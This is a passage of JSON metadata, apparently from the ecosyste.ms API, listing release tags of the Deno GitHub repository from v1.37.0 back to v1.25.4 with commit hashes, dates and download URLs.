om/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/